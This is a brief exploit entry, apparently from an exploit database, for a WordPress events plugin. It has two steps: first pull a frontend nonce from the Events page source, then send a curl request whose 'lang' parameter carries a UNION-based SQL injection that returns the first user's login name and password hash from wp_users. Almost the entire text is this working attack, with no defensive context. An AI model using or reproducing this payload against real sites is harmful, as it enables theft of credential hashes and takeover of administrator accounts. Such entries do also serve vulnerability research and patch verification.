## https://sploitus.com/exploit?id=WPEX-ID:FF5FD894-AFF3-400A-8EEC-FAD9D50F788E
Obtain a valid nonce (visit the "Events" page, default is /events/, and extract it from the source while looking for "translate_frontendnonce")
Invoke the following curl command to select the username and password hash of the first user (be sure to replace the "eme_frontend_nonce" before executing the command):
curl -i "https://example.com/wp-admin/admin-ajax.php?action=eme_select_country&eme_frontend_nonce=3d1239ca13&lang=enen'++UNION+ALL+SELECT+NULL,(SELECT+CONCAT(user_login,+'%3a',+user_pass)+from+wp_users),NULL,NULL,NULL,NULL--+-'"